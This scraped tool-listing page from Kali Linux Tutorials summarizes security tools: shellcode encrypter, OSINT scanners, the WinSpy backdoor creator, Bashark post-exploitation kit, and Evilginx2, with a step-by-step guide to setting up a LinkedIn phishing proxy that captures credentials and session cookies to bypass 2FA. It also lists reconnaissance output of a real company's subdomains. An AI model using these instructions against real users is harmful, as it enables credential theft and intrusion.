Kali Linux Tutorials

Shellcode-Encrypter-Decrypter : Shellcode Encrypter & Decrypter by using XOR Cipher

Shellcode-Encrypter-Decrypter is a Shellcode Encrypter & Decrypter, Using XOR Cipher to enc and dec shellcode.

Shellcode-Encrypter-Decrypter Installation

git clone https://github.com/blacknbunny/Shellcode-Encrypter-Decrypter.git && cd Shellcode-Encrypter-Decrypter/

python enc.py --help

Also ReadMunin – Online Hash Checker For Virustotal & Other Services

Usage Example

Encryption:
    python encdecshellcode.py --shellcode \x41\x41\x42\x42 --key SECRETKEY --option encrypt
Decryption:
    python encdecshellcode.py --shellcode \x41\x41\x42\x42 --key SECRETKEY --option decrypt

Help

usage: enc.py [-h]  [-s SHELLCODE]  [-k KEY]  [-o OPTION]
Encrypting & Decrypting Shellcode
optional arguments:
       -h,  --help			show this help message and exit
        -s  SHELLCODE,	--shelcode SHELCODE
				Shellcode To Encrypt & Decrypt
        -k  KEY,  --key KEY		Key Of The Shellcode To Encrypt & Decrypt
        -o  OPTION,   --option  OPTION
				Argument For Encrypting & Decrypting Shellcode

Twitter-Intelligence : OSINT Project Performs Tracking & Analysis Of The Twitter

Twitter-Intelligence is a project written in Python to twitter tracking and analysis without using Twitter API.

This project is a Python 3.x application.
The package dependencies are in the file requirements.txt. Run that command to install the dependencies.

pip3 install -r requirements.txt

SQLite is used as the database.
Tweet data are stored on the Tweet, User, Location, Hashtag, HashtagTweet tables.
The database is created automically.

Also ReadLibssh-Scanner : Script to identify hosts vulnerable to CVE-2018-10933

Twitter-Intelligence Usage Example

Application work view:

Get help

 python3 tracking.py -h

Get tweets by username

 python3 tracking.py --username "HaberSau"

Get tweets by query

 python3 tracking.py --query "sakarya"

Get tweet at a specific date range

 python3 tracking.py --username "HaberSau" --since 2015-09-10 --until 2015-09-12 --maxtweets 10

If you get location of tweets, add –location “True” param but application will be slower due to new response times.
```
 python3 tracking.py --query "sakarya" --location "True"
```

Analysis

analysis.py performs analysis processing. User, hashtag and location analyzes are performed.

Get help:

python3 analysis.py -h

for location analysis

python3 analysis py --location

location analysis runs through address http://localhost:5000/locations

You must write Google Map Api Key in setting.py to display google map.

GOOGLE_MAP_API_KEY='YOUR_GOOGLE_MAP_API_KEY'

Runs hashtag analysis.

python3 analysis.py --hashtag

Runs user analysis.

python3 analysis.py --user

Graphical User Interface

socialgui.py used for GUI application

TLS-Scanner : The TLS-Scanner Module from TLS-Attacker

TLS-Scanner is a tool created by the Chair for Network and Data Security from the Ruhr-University Bochum to assist pentesters and security researchers in the evaluation of TLS Server configurations.

Note: It is a research tool intended for TLS developers, pentesters, administrators and researchers. There is no GUI. It is in the first version and may contain some bugs.

Compiling TLS-Scanner

In order to compile and use it, you need to have Java and Maven installed, as well as TLS-Attacker in Version 2.6

$ cd TLS-Scanner
$ mvn clean package

Alternatively, if you are in hurry, you can skip the tests by using:

$ mvn clean package -DskipTests=true

If you want to use it as a library you need to install it with the following command:

$ mvn clean install

For hints on installing the required libraries checkout the corresponding GitHub repositories.

Note: In order to run this tool you need TLS-Attacker version 2.6

Also ReadMetadata-Attacker : A Tool To Generate Media Files With Malicious Metadata

Running

In order to run it you need to run the jar file in the apps/ folder.

$ java -jar apps/TLS-Scanner.jar -connect localhost:4433

You can specify a host you want to scan with the -connect parameter. If you want to improve the performance of the scan you can use the -threads parameter (default=1).

Bashark – Bash Pentesters & Security Researchers Post Exploitation Toolkit

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits. To launch it on compromised host, simply source the bashark.sh script from terminal: $ source bashark.sh Then type help to see it’s help menu.

Bashark Features

Single Bash script
Lightweight and fast
Multi-platform: Unix, OSX, Solaris etc.
No external dependencies
Immune to heuristic and behavioural analysis
Built-in aliases of often used shell commands
Extends system shell with post-exploitation oriented functionalities
Stealthy, with custom cleanup routine activated on exit
Easily extensible (add new commands by creating Bash functions)
Full tab completion

Also ReadMetadata-Attacker : A Tool To Generate Media Files With Malicious Metadata

Video Tutorial

Winspy – Windows Reverse Shell Backdoor Creator With An Automatic IP Poisener

WinSpy a Windows reverse shell Backdoor creator with an Automatic IP Poisene.

Dependencies

metasploit-framework
xterm
apache2

Also ReadEvilginx2 – Standalone MITM Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-factor Authentication

Winspy Installation

sudo apt-get install git
git clone https://github.com/TunisianEagles/winspy.git
cd winspy
chmod +x setup.sh
./setup.sh
chmod +x winspy.sh
./winspy.sh

Screenshot

Disclaimer

The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

Credit: Belahsan Ouerghi

ct-exposer : An OSINT Tool That Discovers Sub-Domains By Searching Certificate Transparency Logs

ct-exposer will query the CT logs for a given domain, and then try to do DNS lookups for the domains to see which ones exist in DNS. In my experience, so far, I’ve found numerous sub-domains that were not located with ‘site:domain.com’ google searches.

Keep in mind that the domains that do not resolve, they can either be old domains, or internal only domains (Ex: you need access to the internal DNS server to resolve them).

Certificate Transparency (CT) is an experimental IETF standard. The goal of it was to allow the public to audit which certificates were created by Certificate Authorities (CA). TLS has a weakness that comes from the large list of CAs that your browser implicitly trusts.

If any of those CAs were to maliciously create a new certificate for a domain, your browser would trust it. CT adds benefits to TLS certificate trust: Companies can monitor who is creating certificates for the domains they own.

It also allows browsers to verify that the certificate for a given domain is in the public log record. These logs end up being a gold mine of information for penetration testers and red teams.

ct-exposer Usage

usage: ct-exposer.py [-h] -d DOMAIN [-u] [-m]

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        domain to query for CT logs, ex: domain.com
  -u, --urls            ouput results with https:// urls for domains that
                        resolve, one per line.
  -m, --masscan         output resolved IP address, one per line. Useful for
                        masscan IP list import "-iL" format.

Also ReadInfog – Information Gathering Tool

Example output

python3 ct-exposer.py -d teslamotors.com
[+]: Downloading domain list...
[+]: Download of domain list complete.
[+]: Parsed 76 domain(s) from list.

[+]: Domains found:
205.234.27.243	adfs.teslamotors.com
104.92.115.166	akamaisecure.qualtrics.com
211.147.80.202	cn.auth.teslamotors.com
211.147.88.104	cnvpn.teslamotors.com
209.10.208.24	energystorage.teslamotors.com
209.11.133.110	epc.teslamotors.com
149.14.82.93	euvpn.teslamotors.com
209.11.133.50	extconfl.teslamotors.com
209.11.133.35	extissues.teslamotors.com
209.10.208.31	fleetview.teslamotors.com
64.125.183.134	leaseapp.teslamotors.com
64.125.183.134	leaseappde.teslamotors.com
209.11.133.11	lync.teslamotors.com
211.147.80.201	mycn-origin.teslamotors.com
205.234.27.211	origin-www45.teslamotors.com
205.234.31.120	owner-api.teslamotors.com
12.201.132.70	plcvpn.teslamotors.com
205.234.27.246	quickbase.teslamotors.com
104.86.205.249	resources.teslamotors.com
209.10.208.55	sdlcvpn.teslamotors.com
209.11.133.37	service.teslamotors.com
205.234.27.226	sftp.teslamotors.com
23.227.38.64	shop.eu.teslamotors.com
209.133.79.61	shop.teslamotors.com
23.227.38.64	shop.uk.teslamotors.com
205.234.27.197	smswsproxy.teslamotors.com
209.11.133.36	supercharger.teslamotors.com
209.133.79.59	suppliers.teslamotors.com
209.133.79.61	tesla.com
209.11.133.106	teslamotors.com
205.234.27.200	teslaplm-external.teslamotors.com
209.11.133.107	toolbox.teslamotors.com
209.10.208.20	trt.teslamotors.com
205.234.27.250	upload.teslamotors.com
209.10.208.27	us.auth.teslamotors.com
205.234.27.218	vpn.teslamotors.com
211.147.80.205	wechat.teslamotors.com
205.234.27.212	wsproxy.teslamotors.com
209.133.79.54	www-origin.teslamotors.com
104.86.216.34	www.teslamotors.com
209.11.133.61	xmail.teslamotors.com
211.147.80.203	xmailcn.teslamotors.com

[+]: Domains with no DNS record:
none	cdn02.c3edge.net
none	creditauction.teslamotors.com
none	evprd.teslamotors.com
none	imail.teslamotors.com
none	jupytersvn.teslamotors.com
none	leadgen.teslamotors.com
none	lockit.teslamotors.com
none	lockpay.teslamotors.com
none	neovi-vpn.teslamotors.com
none	origin-wte.teslamotors.com
none	referral.teslamotors.com
none	resources.tesla.com
none	securemail.teslamotors.com
none	shop.ca.teslamotors.com
none	shop.no.teslamotors.com
none	sip.teslamotors.com
none	sjc04p2staap04.teslamotors.com
none	sling.teslamotors.com
none	tesla3dx.teslamotors.com
none	testimail.teslamotors.com
none	toolbox-energy.teslamotors.com
none	vpn-node0.teslamotors.com
none	wd.s3.teslamotors.com
none	www-uat2.teslamotors.com
none	www45.teslamotors.com

Munin – Online Hash Checker For Virustotal & Other Services

Munin is a online hash checker utility that retrieves valuable information from various online sources

The current version of Munin queries the following services:

Virustotal
Malshare
HybridAnalysis

Note: Munin is based on the script “VT-Checker”, which has been maintained in the LOKI repository. Also used plagiarism checker to check and ensure the unique content.

Munin Usage

usage: munin.py [-h] [-f path] [-c cache-db] [-i ini-file] [-s sample-folder]
                [--comment] [-p vt-comment-prefix] [--download]
                [-d download_path] [--nocache] [--intense] [--retroverify]
                [-r num-results] [--nocsv] [--verifycert] [--sort] [--debug]

Online Hash Checker

optional arguments:
  -h, --help            show this help message and exit
  -f path               File to process (hash line by line OR csv with hash in
                        each line - auto-detects position and comment)
  -c cache-db           Name of the cache database file (default: vt-hash-
                        db.pkl)
  -i ini-file           Name of the ini file that holds the API keys
  -s sample-folder      Folder with samples to process
  --comment             Posts a comment for the analysed hash which contains
                        the comment from the log line
  -p vt-comment-prefix  Virustotal comment prefix
  --download            Enables Sample Download from Hybrid Analysis. SHA256
                        of sample needed.
  -d download_path      Output Path for Sample Download from Hybrid Analysis.
                        Folder must exist
  --nocache             Do not use cache database file
  --intense             Do use PhantomJS to parse the permalink (used to
                        extract user comments on samples)
  --retroverify         Check only 40 entries with the same comment and
                        therest at the end of the run (retrohunt verification)
  -r num-results        Number of results to take as verification
  --nocsv               Do not write a CSV with the results
  --verifycert          Verify SSL/TLS certificates
  --sort                Sort the input lines (useful for VT retrohunt results)
  --debug               Debug output

Also ReadSILENTTRINITY – A Post-Exploitation Agent Powered By Python, IronPython, C#/.NET

Features

MODE A: Extracts hashes from any text file based on regular expressions
MODE B: Walks sample directory and checks hashes online
Retrieves valuable information from Virustotal via API (JSON response) and other information via permalink (HTML parsing)
Keeps a history (cache) to query the services only once for a hash that may appear multiple times in the text file
Cached objects are stored in JSON
Creates CSV file with the findings for easy post-processing and reporting
Appends results to a previous CSV if available

Displays

Hash and comment (comment is the rest of the line of which the hash has been extracted)
AV vendor matches based on a user defined list
Filenames used in the wild
PE information like the description, the original file name and the copyright statement
Signer of a signed portable executable
Result based on Virustotal ratio
First and last submission
Tags for certain indicators: Harmless, Signed, Expired, Revoked, MSSoftware

Extra Checks

Queries Malshare.com for sample uploads
Queries Hybrid-Analysis.com for present analysis
Imphash duplicates in current batch > allows you to spot overlaps in import table hashes

Typical Command Lines

Process a Virustotal Retrohunt result and sort the lines before checking so that matched signatures are checked in blocks

python munin.py -f my.ini -f ~/Downloads/retro_hunt

Process an IOC file and show who commented on these samples on Virustotal (uses PhantomJS, higher CPU usage)

python munin.py -f my.ini -f ~/Downloads/misp-event-1234.csv --sort --intense

Process a directory with samples and check their hashes online

python munin.py -f my.ini -s ~/malware/case34

Get the API Keys used by Munin

Virustotal

Create an account here https://www.virustotal.com/#/join-us
Check Profile > My API key for your public API key

Malshare

Hybrid Analysis

Create an account here https://www.hybrid-analysis.com/signup
After login, check Profile > API key

Screenshot

Libssh-Scanner : Script to identify hosts vulnerable to CVE-2018-10933

Libssh-Scanner is a python based script to identify hosts vulnerable to CVE-2018-10933. Libssh scanner has two modes: passive (banner grabbing) and aggressive (bypass auth) to validate vulnerability’s existence. By default, libssh scanner uses passive mode but supply the -a argument and aggressive mode will be used which provides more accurate results.

Also ReadNameles – Open Source Entropy Based Invalid Traffic Detection & Pre-bid Filtering

Libssh-Scanner Installation

Run pip install -r requirements.txt within the cloned libssh-scanner directory.

Help

libssh Scanner - Find vulnerable libssh services by Leap Security (@LeapSecurity)

positional arguments:
target An ip address or new line delimited file containing
IPs to search for the vulnerability.

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-p PORT, --port PORT Set port of SSH service
-a, --aggressive Identify vulnerable hosts by bypassing authentication

Metadata-Attacker : A Tool To Generate Media Files With Malicious Metadata

Metadata-Attacker is a open source pentesting tools you’re able to create an image (.jpg), audio (.mp3) or video (.mp4) file containing your custom metadata or a set of cross-site scripting vectors to test any webservice against possible XSS vulnerabilities when displaying unfiltered meta data.

Metadata-Attacker Installation / Usage

First install docker on your host system.
Now you can simply run the following command:

sudo docker run -p 80:80 --rm lednerb/metadata-attacker

When finished open your favorite browser and switch to the docker ip or http://localhost

Also ReadDocker Tor Hidden Service Nginx – Easily Setup A Hidden Service Inside The Tor Network

Credit: @mniemietz,@derctwr,@Lednerb

Evilginx2 – Standalone MITM Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-factor Authentication

Evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.

This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.

Evilginx2 Installation

You can either use a precompiled binary package for your architecture or you can compile evilginx2 from source. You will need an external server where you’ll host your evilginx2 installation.

Evilginx runs very well on the most basic Debian 8 VPS.

Also ReadimR0T – Encryption to Your Whatsapp Contact

Installing from source

In order to compile from source, make sure you have installed GO of version at least 1.10.0 (get it from here) and that $GOPATH environment variable is set up properly (def. $HOME/go).

After installation, add this to your ~/.profile, assuming that you installed GO in /usr/local/go:

export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Then load it with source ~/.profiles.

Now you should be ready to install evilginx2. Follow these instructions:

sudo apt-get install git make
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make

You can now either run evilginx2 from local directory like:

sudo ./bin/evilginx -p ./phishlets/

or install it globally:

sudo make install
sudo evilginx

Instructions above can also be used to update evilginx2 to the latest version.

Installing with Docker

You can launch evilginx2 from within Docker. First build the container:

docker build . -t evilginx2

Then you can run the container:

docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Phishlets are loaded within the container at /app/phishlets, which can be mounted as a volume for configuration.

Installing from precompiled binary packages

Grab the package you want from here and drop it on your box. Then do:

unzip <package_name>.zip -d <package_name>
cd <package_name>

If you want to do a system-wide install, use the install script with root privileges:

chmod 700 ./install.sh
sudo ./install.sh
sudo evilginx

or just launch evilginx2 from the current directory (you will also need root privileges):

chmod 700 ./evilginx
sudo ./evilginx

Usage

Make sure that there is no service listening on ports TCP 443, TCP 80 and UDP 53. You may need to shutdown apache or nginx and any service used for resolving DNS that may be running. evilginx2 will tell you on launch if it fails to open a listening socket on any of these ports.

By default, evilginx2 will look for phishlets in ./phishlets/ directory and later in /usr/share/evilginx/phishlets/. If you want to specify a custom path to load phishlets from, use the -p <phishlets_dir_path> parameter when launching the tool.

Usage of ./evilginx:
  -debug
        Enable debug output
  -developer
        Enable developer mode (generates self-signed certificates for all hostnames)
  -p string
        Phishlets directory path

You should see evilginx2 logo with a prompt to enter commands. Type help or help <command> if you want to see available commands or more detailed information on them.

Getting started

To get up and running, you need to first do some setting up.

At this point I assume, you’ve already registered a domain (let’s call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider’s admin panel to point to your server’s IP (e.g. 10.0.0.1):

ns1.yourdomain.com = 10.0.0.1
ns2.yourdomain.com = 10.0.0.1

Set up your server’s domain and IP using following commands:

config domain yourdomain.com
config ip 10.0.0.1

Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):

phishlets hostname linkedin my.phishing.hostname.yourdomain.com

And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:

phishlets enable linkedin

Your phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to https://www.google.com):

phishlets get-url linkedin https://www.google.com

Running phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use phishlet hide/unhide <phishlet> command.

You can monitor captured credentials and session cookies with:

sessions

To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:

sessions <id>

The captured session cookie can be copied and imported into Chrome browser, using EditThisCookie extension.

If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.

Disclaimer

We are very much aware that Evilginx can be used for nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender’s responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attacks. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Credit: Kuba Gretzky